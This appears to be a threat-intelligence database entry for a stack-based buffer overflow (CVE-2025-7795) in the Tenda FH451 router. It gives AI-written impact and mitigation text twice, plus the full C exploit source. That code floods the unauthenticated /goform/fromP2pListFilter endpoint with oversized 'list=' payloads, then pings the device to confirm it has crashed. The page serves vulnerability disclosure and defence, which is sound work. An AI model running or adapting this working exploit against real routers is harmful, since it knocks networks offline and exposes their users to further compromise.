Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow
Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow
AI Analysis
Technical Summary
The Tenda FH451 router running firmware version 1.0.0.9 is vulnerable to a stack-based buffer overflow. This type of vulnerability occurs when a program writes more data to a buffer located on the stack than it can hold, potentially overwriting adjacent memory and leading to arbitrary code execution or denial of service. The vulnerability is remotely exploitable, meaning an attacker can trigger the overflow over the network without requiring local access. The exploit code is publicly available and written in the C programming language, indicating that the vulnerability has been analyzed and weaponized to some extent. Although no specific details about the vulnerable function or the exact overflow vector are provided, the presence of a stack-based buffer overflow in a network-facing device like a router is critical because it can allow attackers to compromise the device, intercept or manipulate network traffic, or pivot into internal networks. The lack of patch information suggests that no official fix has been released yet, increasing the risk for affected users. The exploit does not require user interaction, and no authentication requirements are mentioned, which further increases the attack surface.
Potential Impact
For European organizations, this vulnerability poses a significant risk, especially for those relying on Tenda FH451 routers in their network infrastructure. Successful exploitation could lead to full compromise of the router, enabling attackers to intercept sensitive communications, disrupt network availability, or use the device as a foothold for lateral movement within corporate networks. This could result in data breaches, operational downtime, and loss of trust. Small and medium enterprises (SMEs) and home office setups that use consumer-grade Tenda routers are particularly vulnerable due to typically weaker network segmentation and security monitoring. Additionally, critical infrastructure sectors that depend on reliable network equipment could face service interruptions or targeted attacks leveraging this vulnerability.
Mitigation Recommendations
Organizations should immediately inventory their network devices to identify any Tenda FH451 routers running firmware version 1.0.0.9. Given the absence of an official patch, mitigation should focus on network-level protections such as isolating vulnerable devices behind firewalls, restricting management interfaces to trusted IPs, and disabling remote management features if not needed. Network intrusion detection systems (NIDS) should be tuned to detect exploit attempts targeting this vulnerability. Where possible, replacing the affected routers with devices from vendors that provide timely security updates is recommended. Monitoring network traffic for unusual patterns and maintaining up-to-date backups of router configurations can aid in rapid recovery if compromise occurs. Finally, organizations should stay alert for vendor advisories or patches addressing this issue and apply them promptly once available.
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland
Indicators of Compromise
- exploit-code: /* * Title : Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow * Author : Byte Reaper * Telegram : @ByteReaper0 * CVE : CVE-2025-7795 * Vulnerability : Buffer Overflow * Description : * A buffer overflow vulnerability affecting certain Tenda routers, * exploitable via an unauthenticated POST request to an unprotected endpoint, leading to service crash. */ #include <stdio.h> #include <string.h> #include <unistd.h> #include "argparse.h" #include <arpa/inet.h> #include <stdlib.h> #include <curl/curl.h> #include <sys/wait.h> #define FULL_URL 2500 #define POST_DATA 10000 const char *targetUrl = NULL; const char *targetip = NULL; int selectIp = 0; int selectUrl = 0; int verbose = 0; int showOne = 0; char postData[POST_DATA]; struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (!tmp) return 0; m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } void pingPacket() { int pid = fork(); printf("\n============================================== [Ping] ==============================================\n"); if (pid < 0) { perror("\e[1;31m[-] Fork Failed!\e[0m"); exit(1); } if (pid == 0) { printf("\e[1;32m[+] Child Process (Ping) -> PID: %d\e[0m\n", getpid()); char *const argv[] = { "/bin/ping", "-c", "3", (char *)targetip, NULL }; char *const envp[] = { NULL }; __asm__ volatile ( "mov $59, %%rax\n\t" "mov %[prog], %%rdi\n\t" "mov %[argv], %%rsi\n\t" "mov %[envp], %%rdx\n\t" "syscall\n\t" "mov $60, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : [prog] "r" (argv[0]), [argv] "r" (argv), [envp] "r" (envp) : "rax", "rdi", "rsi", "rdx" ); } else { printf("\e[1;32m[+] Main PID : %d\e[0m\n", getpid()); int status; waitpid(pid, &status, 0); if (WIFEXITED(status)) { int code = WEXITSTATUS(status); printf("\e[1;33m[+] Ping exited with code: %d\e[0m\n", code); if (code == 0) { printf("\e[1;31m[-] Successfully confirmed connection via ping!\e[0m\n"); printf("\e[1;31m[-] The server is still working, please try again!\n\e[0m"); } else { printf("\e[1;34m[+] The server is not responding to the ping request!\e[0m\n"); printf("\e[1;34m[+] CVE-2025-7795: Vulnerability confirmed! Server is down.\e[0m\n"); } } } printf("\n============================================================================================\e[0m\n"); } void sendRequest() { CURL *c = curl_easy_init(); CURLcode res; char full[FULL_URL]; struct Mem response = {NULL, 0}; if (!c) { printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n"); exit(EXIT_FAILURE); } if (targetip) selectIp = 1; if (targetUrl) selectUrl = 1; if (selectIp) { snprintf(full, sizeof(full), "http://%s/goform/fromP2pListFilter", targetip); } if (selectUrl) { snprintf(full, sizeof(full), "%s/goform/fromP2pListFilter", targetUrl); } int rounds = 5; int baseLen = 3500, step = 1000; showOne = 1; for (int i = 0; i < rounds; i++) { int len = baseLen + i * step; if (len + 6 >= sizeof(postData)) break; snprintf(postData, sizeof(postData), "list="); memset(postData + 5, 'A', len); postData[5 + len] = '\0'; printf("\e[1;34m[%d] Iteration %d - Length: %d\e[0m\n", i+1, i+1, len); if (verbose) { printf("\e[1;35m\n====================================================================[Post Data] ====================================================================\e[0m\n"); printf("%s\e[0m\n\n", postData); printf("\e[1;35m====================================================================[Post Data] ====================================================================\e[0m\n"); } curl_easy_reset(c); curl_easy_setopt(c, CURLOPT_URL, full); curl_easy_setopt(c, CURLOPT_ACCEPT_ENCODING, ""); curl_easy_setopt(c, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(c, CURLOPT_POST, 1L); curl_easy_setopt(c, CURLOPT_POSTFIELDS, postData); curl_easy_setopt(c, CURLOPT_POSTFIELDSIZE, (long)strlen(postData)); curl_easy_setopt(c, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(c, CURLOPT_WRITEDATA, &response); curl_easy_setopt(c, CURLOPT_CONNECTTIMEOUT, 5L); curl_easy_setopt(c, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(c, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(c, CURLOPT_SSL_VERIFYHOST, 0L); struct curl_slist *h = NULL; h = curl_slist_append(h, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"); h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br"); h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5"); h = curl_slist_append(h, "Connection: keep-alive"); h = curl_slist_append(h, "Referer: http://example.com"); h = curl_slist_append(h, "Cache-Control: no-cache"); h = curl_slist_append(h, "Pragma: no-cache"); curl_easy_setopt(c, CURLOPT_HTTPHEADER, h); if (verbose) curl_easy_setopt(c, CURLOPT_VERBOSE, 1L); char *encode1 = curl_easy_escape(c, full, 0); if (!encode1) { printf("\e[1;31m[-] URL encoding failed for payload\e[0m\n"); exit(EXIT_FAILURE); } if (verbose && showOne) { printf("\e[1;37m========================================="); if (selectUrl) printf("\e[1;37m[+] Input Url : %s\e[0m\n[+] Encode Url : %s\e[0m\n[+] full format Url : %s\e[0m\n", targetUrl, encode1, full); if (selectIp) printf("\e[1;37m[+] Input Ip : %s\e[0m\n[+] full format Url : %s\e[0m\n", targetip, full); printf("========================================="); showOne = 0; } res = curl_easy_perform(c); curl_slist_free_all(h); curl_free(encode1); if (response.buffer) { free(response.buffer); response.buffer = NULL; response.len = 0; } if (res == CURLE_OK) { long httpCode = 0; printf("\e[1;36m[+] Request sent successfully\e[0m\n"); curl_easy_getinfo(c, CURLINFO_RESPONSE_CODE, &httpCode); printf("\e[1;32m[+] Http Code Response : %ld\e[0m\n", httpCode); if (httpCode >= 200 && httpCode < 300) { printf("\e[1;31m[-] The server was not affected, still working !\n"); printf("\e[1;33m-------------------------------- Response Server --------------------------------\e[0m\n"); printf("%s\e[0m\n", response.buffer); printf("\e[1;33m-----------------------------------------------------------------------------------\e[0m\n"); } else { printf("\e[1;34m[+] Negative server response. I started trying to confirm the connection...\e[0m\n"); printf("[+] Run Command Ping For Check Connection : \e[0m\n"); if (selectIp) pingPacket(); else printf("[-] Error Run Command Ping for URl !\e[0m\n[-] Please Enter Target Ip for Check Connection !\e[0m\n"); } } else { printf("[-] Error Send Request, Please Check Your Connection !\e[0m\n"); printf("[-] Error : %s\n", curl_easy_strerror(res)); } } free(response.buffer); curl_easy_cleanup(c); } int main(int argc, const char **argv) { printf( "\e[1;31m" "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖ \n" "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌ ▌▙▌▙▖ \n" "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌ ▌▄▌▄▌ \n" " \e[1;37mByte Reaper\e[0m\n" ); printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------\e[0m\n"); if (getuid() != 0) { printf("===================================================\e[0m\n"); printf("[-] Not running as root. Trying with sudo...\e[0m\n"); char *args[] = {(char*)"sudo", (char*)"./exploit", NULL}; execvp("sudo", args); perror("[-] Error Run Exploit in Root !"); __asm__ volatile ( "mov $0x3C, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : : "rdi" ); } printf("\e[1;36m[+] Running as root! Exploit continues...\e[0m\n"); printf("===================================================\e[0m\n"); struct argparse_option options[] = { OPT_HELP(), OPT_STRING('i', "ip", &targetip, "Enter Target IP"), OPT_STRING('u', "url", &targetUrl, "Enter Target URL"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (!targetip && !targetUrl) { printf("\e[1;33m[-] Please Enter Target IP OR URl !\e[0m\n"); printf("\e[1;33m[!] Exemple : ./exploit -u http://ROUTER_IP\e[0m\n"); printf("[+] OR \n"); printf("\e[1;33m[!] Exemple : ./exploit -i ROUTER_IP\e[0m\n"); __asm__ volatile( "xor %%rdi, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "1:\n\t" "syscall\n\t" : : : "rax", "rdi", "rsi" ); } if (targetip && targetUrl) { printf("[+] Please Enter Traget URL OR Traget Ip address, Exit...\e[0m\n"); __asm__ volatile ( "mov $0x3C, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : :"rdi" ); } if (selectIp) { sendRequest(); } else { sendRequest(); } return 0; }
Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow
Description
Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow
AI-Powered Analysis
Technical Analysis
The Tenda FH451 router running firmware version 1.0.0.9 is vulnerable to a stack-based buffer overflow. This type of vulnerability occurs when a program writes more data to a buffer located on the stack than it can hold, potentially overwriting adjacent memory and leading to arbitrary code execution or denial of service. The vulnerability is remotely exploitable, meaning an attacker can trigger the overflow over the network without requiring local access. The exploit code is publicly available and written in the C programming language, indicating that the vulnerability has been analyzed and weaponized to some extent. Although no specific details about the vulnerable function or the exact overflow vector are provided, the presence of a stack-based buffer overflow in a network-facing device like a router is critical because it can allow attackers to compromise the device, intercept or manipulate network traffic, or pivot into internal networks. The lack of patch information suggests that no official fix has been released yet, increasing the risk for affected users. The exploit does not require user interaction, and no authentication requirements are mentioned, which further increases the attack surface.
Potential Impact
For European organizations, this vulnerability poses a significant risk, especially for those relying on Tenda FH451 routers in their network infrastructure. Successful exploitation could lead to full compromise of the router, enabling attackers to intercept sensitive communications, disrupt network availability, or use the device as a foothold for lateral movement within corporate networks. This could result in data breaches, operational downtime, and loss of trust. Small and medium enterprises (SMEs) and home office setups that use consumer-grade Tenda routers are particularly vulnerable due to typically weaker network segmentation and security monitoring. Additionally, critical infrastructure sectors that depend on reliable network equipment could face service interruptions or targeted attacks leveraging this vulnerability.
Mitigation Recommendations
Organizations should immediately inventory their network devices to identify any Tenda FH451 routers running firmware version 1.0.0.9. Given the absence of an official patch, mitigation should focus on network-level protections such as isolating vulnerable devices behind firewalls, restricting management interfaces to trusted IPs, and disabling remote management features if not needed. Network intrusion detection systems (NIDS) should be tuned to detect exploit attempts targeting this vulnerability. Where possible, replacing the affected routers with devices from vendors that provide timely security updates is recommended. Monitoring network traffic for unusual patterns and maintaining up-to-date backups of router configurations can aid in rapid recovery if compromise occurs. Finally, organizations should stay alert for vendor advisories or patches addressing this issue and apply them promptly once available.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52374
- Has Exploit Code
- true
- Code Language
- c
Indicators of Compromise
Exploit Source Code
Exploit code for Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow
/* * Title : Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow * Author : Byte Reaper * Telegram : @ByteReaper0 * CVE : CVE-2025-7795 * Vulnerability : Buffer Overflow * Description : * A buffer overflow vulnerability affecting certain Tenda routers, * exploitable via an unauthenticated POST request to an unprotected endpoint, leading to service crash. */ #include <stdio.h> #include <string.h> #include <unistd.h> #include "argparse.h" #include <arpa/i... (11761 more characters)
Threat ID: 687ffbf0a915ff00f7fb52bb
Added to database: 7/22/2025, 9:00:32 PM
Last enriched: 8/11/2025, 1:18:47 AM
Last updated: 8/15/2025, 1:24:25 AM
Views: 17
Related Threats
U.S. CISA adds N-able N-Central flaws to its Known Exploited Vulnerabilities catalog - Security Affairs
MediumU.S. CISA adds Microsoft Internet Explorer, Microsoft Office Excel, and WinRAR flaws to its Known Exploited Vulnerabilities catalog
MediumCisco ISE 3.0 - Remote Code Execution (RCE)
CriticalCisco ISE 3.0 - Authorization Bypass
Mediumprojectworlds Online Admission System 1.0 - SQL Injection
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.